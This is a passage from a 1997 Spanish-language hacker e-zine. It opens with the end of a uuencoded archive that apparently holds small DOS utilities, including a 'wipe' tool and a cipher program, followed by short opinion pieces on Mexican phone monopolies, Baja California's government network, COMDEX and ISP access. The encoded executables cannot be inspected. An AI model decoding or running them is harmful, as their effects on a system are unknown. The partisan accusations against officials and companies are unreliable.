M8Q\_[X[.0U#L2?YV[IUT0JS!ZWV88?8RIDWWZPN_/NI,=3X.7&Y'Y<-6$$?G
M0O.R[YBQ*#R"]*#3A/]S>.AX)RX"(;EAVMS9*<!Y<.,1O'-L\-JSI@)P61J,
MLFMN*P,/&YQQ!V!*@+!Y^3DI*=?F!NR#EP=K<&'Z[*Y#EX5\M^+O'#@\]%'G
MJ/%MP!&!HPG/ZAQ@T-?VT?G^-KMWP%E=C^?A_^S,4$L[&12\?]T9;(=?U37*
M2[LP!.M\7EB+@GV-<#U;V'4'ST]%8%ZGYV1W^<\27^<[2IP0,6KNM$6=EN3]
M,[P)-\)/PBXV?W9!%W<&AL*N;%R.KV(+(O!OQAS_$'ZZ-9C=SM^VVW_W\/Q%
M=]TV)F>1OZ,NT'RHHV^B4P1L>P+G%]RGY0S>?Q/TDLZ?]G6D,+39`#"5_IZ-
M86+AKX`=,S5RVEQ_Q\+:SL06;,^>$MPJJ##"#\%G#N*O_-?>F5>PJ.M`:&?P
M>?_XKJ'A3G[6JUB'TH4_*O`R*+N_<^E+$6$=Z)R?/6'VSO4#5SZN4DR'QP^/
M-W#XJ%5=D,O\0QLZSQY'=X3/N^-]+8'"A#\M,2+5]\+!<P/<F_\/#$KIMF!^
M?K#-]PQ4X*XS?7G.0M_SWIB7?4:?H3)![6[T$_AP/P]TZ6;'B5X7^++A?@+%
M6,^4+3'<E3MYB&P[.O_'[YD_[8[<\(X,I4"?_^S,RT,#NK":GCOMMIP[@RU?
M3P3GV#FVN*[7A&X.<!1F=W2@OO.FA_7EJ0"[_G-?=VEHY)R\1>%YF!2\Q^?5
M\-"$X'D89L-#YW=TRG`T?+YC=)V?N_<L1Q#FQ.$.->\Z\OE91WS7,*+;@C-3
M_DK@8[IX^=E9KX5S[SJK8)B;?;3DY-P%RG1L?%L0^+?.T6P*7$%X8[E/NCI1
MP)7_!X^84"C-OWT%&47&D@SR@/:DME]KT_ZN1>N]];[Z`/T:W=53].OU##U/
MGZ^OT9_67]1?U1OTGL9%QN7&(&.H(8SKC`G&K<8L8ZGQB/&T\;Q19GQHQ-)!
M]&HZC'+JT>MH&OT%G4J7T#7T.?H>/4DO,&/-&\T<<[;YH;G06F']TMI@';:.
M66W6*>M<NX]]I7V-K=G2OM:^T<ZV9]EY]F)[F;W!?MI^P?Z]?<+NST:S7'8W
M;^2#Q42Q0@R5$^5B^:C<*)^1%7*'_%PF.ZG.?*?(>=39Z.QT]CG[G3\ZS4Z2
MRE#SU6)5I)Y3F]465:&VJYVJ6KVG]JLZ]9GZ0C6KWNY`-\$=XIJNXXYP"]Q2
M=Y*7ZRWP%GM+O%7>.N]9;[/WFE?IO>V][_W!J_>.>%][?_/"%Z-5!1LB]R)]
MR&4D@0PC%AE.4LE$<C/)(;ED`7F0/$U>)MM)-=E'INLS]%S,Z3WZ,GVCOE?_
MF][/6&*\8+QA[#$^,W2:3+?3;N85IC)3,%=3S-7F>O,S\TOSA'G2O,EZU'K*
M>M&JM`Q[E#W53F!%?"6/$V^)]\0^<4`<%E^)9G%21,I^4I=CY4WR17F!&J#6
MJE;5RR7N.'>>N]']J]O?V^+]QA\["05[E223>M)#T[4T;14J'6=,,::CFGN,
MGJC?+#K(_+E),8I#YG^:REJ%:@VS)Z(^*^PJ^Q/[F!W'4MD,5L)JV%">S!_G
M5SK;G$JGRMGE5#M[G1JGUBE4V]1OU`EU4MWCKG7WN/[%>_[G?D[ZZ0GZ2YB%
MEXVMQE^,$T8_.H2FT\ET,5U/CUBG60]^`Y_&[^,/\E5\!V_@?^/=1$\Q6MPN
M'A2EXDV<^?OB.U$HQSM9SD"5I1Y5I>I=U:*$6X0*ON8VN^=X0[Q\[S[O0>]+
MS_]V@[]/_Z5D,)E#GB$59#<Y1B[4DK2YVGRM4'M(>U2+T'OIB?IX5&F.OD3_
M6H\W3/,NL\"\S_S`_,B,LA9;F2R+/<C6LZ?8?[!Z]DM>S)_AF_C+O(*_P:OX
M;KZ7[^,'^"<8[5>\F1_C;?P4CQ3GB1C15PP0@T2B&"JH$")97"?2Q`21*6X5
MV6*6R!/S1:%8(I:+Q\0Z\23.;[,H%UM%I?BMJ,9YUHJ#HEY\(9K$UZ(550[)
M'C):]I%Q\G*9((=((BWIR!$R%97/D#?++#E#YLJY<J&\3RX#2U;+]U"+9N<[
M)Z2B56_57R6HJ]4P-4G9[O7N5^XW;I1G>*G`_&O>'SU_(X!:_SLA9#S)(C,P
M7P^0#<!Q&7F%O$YVDE.DMW:)-D@;K%&=Z8Z>#+W8J-?HM?H!O4ZOUSUC/'`T
MS;C+R#<:C6/&:2.*]J8)]!I*J*(C:(35RYIH3;%>L;ZTOK5.6FEVACW'7F`?
ML.OL>KO!;K0YN)['"MA"5L@.L^68C9UBA5PK7Y9;Y:=.O'I8M:L>;IP[V!7N
M#6Z6N\A=Z3[KEKEON-7NGW`V[>ZEW@W>-.^HU^*U>_[7S<O\Y1[2@_0F<\E"
M,E"?H$_7[]37Z^7Z=OUM?9_^A7Y4/Z%W-QQCI+':*`8K/P<'^M$KZ<_I:'H;
M+:!+Z0IZD!ZC%>9>,]+^A;W5?L>.8,/8"#:)G<,OY>OYW_E&^;;,4@7J>6#^
M([?4V^25>>5>A;<-ZE'E[?*JO;U>C5?K'?#JH",-7J/7Y#5CC*U>FS_.(DB*
M?_4LN8AHY`MRL39.2]7'ZJLPSDT8Z59@\CN]78\TJ#';6&%4&P>-P\8%-!;C
MS`9;Y])E]$\T$?HQRAQOSC3O-!<!N\,L;HVV%ECW6FNL8FNS56YMMW99'UMU
M5@\[SK[<MFS''FF/ML?;-]F/V(]#<5^T=]M'H+F1+(I%LQ@6R^+8`!;/$E@B
M2V*$4<:8PY)9"MB?QM)9!IN&:MW+=K-CF(D+^,_X$,[Y"'X;S^=K^%;^,9C0
M1^C`^URQ!JC^6!P3?:!2$X#0-:CHQ_*8[./HSE+G.:CVM\X:==R-\,[SQG@3
M,7^O>&]!>0]ZX<W8:C`_YV-^?@:E'4DR21Y92YXBW;08[5+M%BU'FZ,5:^7:
M+NTC[:C6JEGZ)'V/?D3O85QO3$*WVF\<,O[3B*`7TTR:A1G;C8I^1K^F(?-B
ML[])S!%FAGF;F6\6F\^9W:QH:[#ES]X\ZW[K">L9J\S::E59Q!;VS?:U;!Q[
M@KW)#K+/<=;]<<XC^1A^(W^*5_)A8K;8)GXG?A"#9)*\3<X&"^.<>&>(\[QS
MS&ES3CF1ZCP5H_I"GP>I1#544254LKI.I:D)*E/=JK+5+)6'OE6HEJCEZC&U
M3CT)==NLRM565:E^B_[UOJI5!U4]^E>3^AH:?U*%W!YNM-L'K+@\Z&;$M8)^
MENJ.=3/<F\&2&6ZN.]==Z-[G+G,?=5>[3[@E[O-@S7^XV]SM[B[W';?&_=BM
M<S]W&]V_N"WN=^!1-R_*N\"+]?IY\=Y57I*G>\QSO13O>B_=F^1-\:9[,[V[
MO`+O'J_(>\A;Z:WQBKUG@/N7@?HW@/G=0/P^X/T3H/TK8/T8D'[*KV5I^'KQ
M2'(>B2%]R0`RB"22H80209+)=22-3$!U;R799!9J/)\4DB5D.7F,K"-/DE*R
MF923K:22_!9]]7U22PZBBWU!FLC7I)6<)"&MAQ:M]='BM,NU!&V(1C1+<[01
M6JHV5LO0;M:RM!D:ON`4:O#O,T.>);\B[Y#NVL7:95HB7KM`6Z=MT2JT'=KO
MM/>U/VNW@']/ZI.-'&.>\2;T+`I*-H/FT\UT!+`@[6;[[]"!GJPWNYCU9U>R
MJZ$)G"DVDAUB+O^4CU8WJ/'J1O4+=8N:IG+4'>I.=;>:IQ:I>]4#ZD'UB%JE
M?JG6JXWJ:7B47ZF7U"OJ-?5K*,A;ZG=J#YS*[]5'Z@_JCW`K1]15J-TKKE\)
MX:5Y&=Y4[W9O@_>T][RWPSOD_0ES_%?ON/>#YV_>XE^ZW@/>I"^Y"JYD+N;N
M,(G1^F%&-(UK*5"76>A]]VG+M2>TY[3CVGS]$7T#7,"O]%\;VXV/P94FXVNC
M.^U++3H&?N!6.+E&J]T:"@9,@4KLL">S'#:'+6)+V2JV@<V7?Y61SKE.K-//
MB5+Q:I*O:;7A_1"CH;Q^C=>3M9JN5^GGPF6\8E0:Y]![Z3`HT%CXBEOMA]@Z
M]APK8RE\`I_,/Q4-4(J3XASY./S==W*`,]0Q'-<9ZTQW9CIW.JN<5YT/G(-.
M*Q@5I:Y1Z7`!)]S3;B'P]Q(T=X>W$UK[Y\"M!9AK"&`7.A>(BR57$@67-A7X
M^HH>I=_1'N;5<%WSS<?-\ZUU]D9[D_VR_:J]W=YE[[%K[2_L%/2D?>QO;`S/
MY7/Y`KZ,/\+7\=?Y'WB4N$CT$P/%$$&$&?3V,6*2F"*FB5QQ-_KZ`^()\0*\
M2G=YG4Q'=\Z6<V2^7"3OE4OE$S+?6:*H.]*=X/H;./C7C0T,G"0%[N>1(CC(
MU9BU4J#T;9*EQ1LW&(1FT`?H:[2O>:T9LHY:?6S=?I:=X*?YN1A)@M#$+6*Z
MN%/DBX5BJ2A6M[N?NB.\]>CLS9B%"/RU*Q0J)T?)HT!Y#WB>OOIE^A+S&?--
MT[&V6.$-??R].WO#TX[4DO2WT-O;]6W&*/_B5S0H?XQQA)!QR`\KH+_OD$':
M/=IJ[74M2L_4?ZU/-%X$4W8#.R>-2^G/J$EO1/=\"5K;0/]"6^G?Z?EF7_,J
M<YCIF9^8<=;/K>?0BRZRX^$G][`/68B$-Q3J12XF_3`75Q.#,#("B64\V4%^
M#ZZ?(N<#PY8V7,O6#FEOZ#OT=_3#>K*13*^%AYP$=E9"V\O-=^#<#IKG6@.M
M,=8'^,W[P<E/X2B^9$?84?8-.\Z^9S^PTZP[[\E[\0OY1?P2WI\/Y%?PP?P:
M/HP;W.:2>]#V45#W<7PBOPFXG(K.=CN?S>>@ORW@B_G]?"E_F*^`_UW+-Z`#
M/,M?X"_R+?Q5H.-->->=_&W^+O^`?\CW\T-0A,/\2WZ$'^7?\./\>_X#ZM8=
MSK:7N!#5NT3T!Y*N$(/%-6*8,(0MI/#$2#$*F!J'Y'.3F"RFBMO@@F>+.:CP
M`K%8W(\J/XQ,]+A8*S:(I\2S0-N+8HMX5;P.G[P#WNEM\:[X0'PH]HM#XE-D
MA2_%$7%4?"..B^_1I4X#F3UE+WFAO$A>(OO+@?(*.5A>(X=)0]I22D^.E*/D
M&#D.F>LF.5E.14^['5W-1_$"I+#[@>.'Y0JP=*W<()^2S\H7D#ZVR%?EZ_)-
M9+.=<$7OR@_DAW*_/"0_E8?EE_*(/"J_D<?E]_('>5IV=WHZO9S^X'8A$MPR
M9[FSTEGMK'.*G1*GU-GDE#GE3L5_RQ8'G#JGWFEP&ITF>-L6Z$";TPZ'&ZFB
MX&TI]+,!W?&4BG8O<>-=W4UQ1Z,33G:GNGGN(^YCR$//N"^Y%>A^>]S/X!N/
MN$?=;UT_%(7O@Q36SGARFIRG3=(G(Q?DZ>.,FXT>9B_@-]X\;9YG8:DRV!^H
M\[5;R!L$E\D'UQEFH(/YFUG-]+\>0B*A.8DDB3@D';S))O%Z4N">T_0I2(6%
M^DJ]!!ZO"ERKUYO!MVAC@)$$/YH&+YUK%!I1=K0=8\?"LPT`4Q+L1#O))C:U
M&=0SV4ZQ4^TT.QU..A/:G(6,-M/.18HNL!?:A781LO1R>Z6]VEYG%]LE=BG4
MK<PNMROL;78ELMPNN]K>:]=`Y[H\>!,Z6XO=:K?9[7:(_70OF,FF("5ELYEG
M>?@BMHPM9RO9:NA[,?)B*=L$E2]G%6P;JV15;!>K9GN1(FO9`5:'9-7`&ED3
M:V8MK)6UL786XE$\FL?P6!['!_!XGL`3>1(GG'+&'23/%)[*TW@ZS^"9?`K/
MXME\)L_C!7PA+^1%4.KER,JKH=;%O(27(K&5\7)DMFWP:E5\%Z]&;JOAM;R.
MUR.Y-?(F9+<6WHKTULY#(E)$B6@DN%@1APP7#WU-%$E0>BH8M#Y%I"+)I8L,
M9+DI(@MI;B94/T\40'L+19%8ADRW4JQ&JBL6)<AU9<AU%7"'E<+'\0%@MQ5N
M,!9YC*H4K%5D(SVLQII#L5?BE9Z5'OYE=JB("$5U#^,LBD0''2X.'3<^P!Q!
M-V'P52E8FT@+\)=)IB#;99.96*7((P7(1(7H-<M(,2F!MZHB\7!.B4C'1*,:
M@WM*AE](Q2I!.AQ4IC8%'BI;FZGE:GE:@;80^;D(+F*E5J(U:<U:"YQWF]:N
MA?1(/4J/UF/T6#T.*TOQ2/R)0#W1NW)CJIZ.E:9LO0!K(DW_%/<KC1*CW*@R
M:HQZ(X;&TT2:1!VL+TVAN;20KJ;K:#$MH:5T$RVCY;2";H/V5]%=M)KNI36T
MEAZ@=;0>G:>1-M%FV@*O'P/N$C/5S#3SS"*LLI2:E<AT+68[NFD47/\`*\ER
MK#0DU%RKT%IIE2`S55DU5KW5#/<3#9;Y#//Y50A.E8!'5>!./?C2;D>#'4E@
M1!HP[^/=1WLY$%[S3S`=^7]`=>[_"M>U6(UH!)(C@=X$(#8%.,T61";+/*P-
M%,HBK`XLERNQ/E`L2V2IW"3+9#G6T[;)2EDE=\EJN5?6R%IY0-;)>MD@&V63
M;);XDJ8SP$EV4K#BEN9D0JU]I2Z#.O_/F%Z&#+,):T'5ZH!J1%Z)=&.14B@T
M.</-QIK;,G>=NPE*7(W\4>\V(($T806GQ6UUVY!"0EXD<DBT%X,D$N<-0!9)
M\!+A@8E'D4<<+QF))-/+1A8)[8H([0WT-J8#_PEG,<#YB1PHP_K0-N2+*K(+
M"6,OJ4'&.$#JX#P:2"-R1C-I0=)H(^W(&I%:%-)&#-C"`I9D_(@7RP)FK$:J
M*`8_2K5-6AD2:H6V3:O4JI!4J[6]6HW6`-9T<281_$C7L]!O"O4BO5@OTW=A
M=:5);]-CP(YX@QC)1KJ19>0915BM*(6/WFO4P:VW&*U&F]%NA&@4C:8Q6!F(
M`V,2`LX02BD#<Y)I"DT%?]+A(C/!HBRL'<P$E_*PQK$0C"K"*L)RNK*#63^=
M5ZVTC;:#79%FE!D-CL6:<>!9@IEH)H%MU&2F8R9C93/53#/3D;,SL<*9969C
MG2(7/"PP%YJ%8.,R<[FY$IQ<APQ>:FXRR\QRL\+<!H96F;O,:O"TQJPU#YAU
M9KW98#::368SF-MJM@7LC0SX&V/%6G%6O)5@)8+)Q&)@<[*58J5:65:>M1RK
M(*58`:FU6JR0W=55NWIJ*GIH5P<M0M?\*3TS$9VPJP_.1-_KZGHEK$VTBUCD
M_025!%8XX$4:F#$%W,@%.PK!CTI5I6JZ]+RV8Y]"Z/E,H+-);T7UV_60$6E$
M&=%&C!%KQ`582#`2H9<$:T(,JIELI!BIT,YT(\/(-@J,_U^N:_KWX]^/?S_^
M]>._`%!+`0(4`!0``@`(``!@C"=:G\+:6Q8``'D7```(````````````(```
M``````!765!%+D-/35!+`0(4`!0``@`(``!@C"?S@4SN318``%87```*````
M````````(````($6``!#25!(15(N0T]-4$L!`A0`%``"``@``&",)VVP];-4
M`@``FP0```8``````````0`@````]BP``$Q%04U%(5!+`0(4`!0``@`(``!@
MC"=\Z.,U@<P```"H`0`)````````````(````&XO``!(141)5"Y%6$502P4&
@``````0`!`#9````%OP```X`+3U;4F%R94=A6GI=/2U=
`
end
..............................................................................
{Fin de UTILS.UUE}

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

(*)(*)(*)(*)(*)(*)
(*) Noti-LOONS (*)
(*)(*)(*)(*)(*)(*)

El editor de esta revista no se hace responsable de las opiniones expresadas
en esta seccion. Los responsables son todos aquellos que envian sus noticias
y comentarios a RareGaZz para su publicacion anonima.

------------------------------------------------------------------------------
Privatizacion de los telefonos en Mexico
------------------------------------------------------------------------------
En los recientes dias se habla mucho de la competencia entre TELMEX y las
nuevas compa¤ias formadas por gigantes de las telecomunicaciones como lo son
AT&T y MCI.
Supuestamente ahora si hay "competencia" y el estado intenta dejar de ser
el due¤o de uno de los monopolios mas grandes que poseia. Esta paso marca
el fin del socialismo escondido en el que viviamos pero ahora surgen los
imperios capitalistas llamados monopolios que coincidentemente tambien maneja
el Estado.
En algunos lugares de la republica la entrada de la tan llamada competencia
ha sido pospuesta por $intereses$ mas fuertes que la ley. En Baja California
y Sonora maneja los telefonos TELNOR (Telefonos del Noroeste) quien ha
probado ser un ladron descarado haciendo pagar a sus subditos cantidades
tontas por el uso del telefono basados en su "servicio medido".
Compa¤eros! Digamos si al advenimiento de la competencia y eliminemos los
monopolios creados por el Estado. Hablen con su politico mas cercano...

------------------------------------------------------------------------------
Baja California a la vanguardia en comunicacion y telecomunicaciones
------------------------------------------------------------------------------
Seguramente han escuchado esa linea algunas veces en la television o habran
leido un mensaje en el periodico mencionan tal haza¤a. Pues queridos amigos,
nos estan mintiendo.
Y me refiero especificamente a el anuncio publicado en ZETA (Baja California)
pagina 8 seccion-A publicado el Lunes 3 de marzo de 1997 diciendo que B.C.
"cuenta con una red de computo robusta, de cobertura estatal, a la que se
encuentran conectadas mas de mil estaciones de trabajo" Jah! jAh! jaH!
Esto lectores, es pura mentira de un gobierno sin escrupulos que aprovecha el
exito amarillista de las redes como Internet y desea atraer afiliados a el
mintiendo solamente.
"Teniendo como base esta infraesctura...El gobierno de Baja California se
integra a la red global..." Jah! Otra vez mas, mienten.

Las computadoras de Baja California se encuentran en esta direccion:
www.baja.gob.mx
Y creian que me la iba a creer...

Esta direccion es aparte de un poco exagerada, Falsa! El gobierno no tiene
ni un solo servidor en esa direccion, pero eso si, le pago a la compa¤ia
Telefonos del Noroeste establecida en ese estado una modica cantidad de
billetes para que les pusieran un nombre de dominio que aparentara que el
Estado de Baja California de hecho tenia redes de gran tama¤o.
Ahora bien, por que con la compa¤ia de Telefonos?
Pues amigos, el gobierno le permite cobrar tarifas exageradas por cada minuto
despues de un limite de tarifa plana. Y si eso no fuera poco, bloquea la
entrada de la competencia para seguir con el monopolio panista. Guahgk! me
dan asco...

------------------------------------------------------------------------------
COMDEX
------------------------------------------------------------------------------
Lo nuevo en Computadoras y sistemas? Desde luego amigos...que NO!

Estas exposiciones de productos son COMERCIALES unicamente, por eso, las
nuevas tecnologias permanecen al margen mientras se difunden los comerciantes
que tienen las tiendas retacadas con su producto.

------------------------------------------------------------------------------
PC NOTICIAS
------------------------------------------------------------------------------
El articulo "Seguridad en Internet" que aparecio en PC-NOTICIAS de el mes
de Marzo fue publicado bajo el nombre de RareTrip quien es el editor de esta
revista como una forma de ganar adeptos a este tipo de articulos y asi,
hacer conocida nuestra revista. Asi pues, el texto Seguridad en Internet de
el numero 1 de RareGaZz NO FUE PIRATEADO por nuestra revista, simplemente
decidimos publicar un articulo de esta revista.
Gracias a Rafael Rojas (RROJAS@TELNOR.NET) quien nos dejo participar de
forma anonima para la revista en la que el colabora mas no edita (como el
mismo nos hizo saber).
Si aparecen otros articulos de RareGaZz en Pc-Noticias sera cuando RareGaZz
apruebe dicha accion unicamente; asi pues, si en RareGaZz aparece un articulo
publicado en Pc-Noticias sera cuando Pc-Noticias nos conceda el derecho de
hacerlo.

------------------------------------------------------------------------------
EXIGAN SUS DERECHOS
------------------------------------------------------------------------------
Si tu obtienes el acceso a Internet por medio de un ISP como tu compa¤ia
telefonica o COMPUNET, etc. no permitas que te niege el acceso a la red una
se¤al de ocupado cuando quieras entrar a el servidor de la compa¤ia.
Algunas veces tenemos que esperar horas y otras solo minutos, pero la
obligacion de la compa¤ia que presta el servicio es ofrecerlo las 24 horas
y mantener las interrupciones debido a mantenimiento al minimo.

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

Diviertanse y hasta el proximo numero...

________
( )____
Editor = raretrip ( RareGaZz )
Graficas = TvAzteca ( La Droga Sin )
Comercializacion = Teloenvicia ( BAJON )
Color = LSD ( __ )
Animo = Cannabis Sativa . (_____) (____)
Colaboradores = Le PompeItor - KillerBot . ? . ()
Texto = click,click,click __ ()
Comentario = Alguien podria conseguirme / \ ()
la primera version PGP?? |_ _|
|(0)||(0)|
/|_ \/ _|\
|| | == | ||
|| \____/ ||
///\ !! /\\\
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-

RareGaZz
<<::Viandra::>>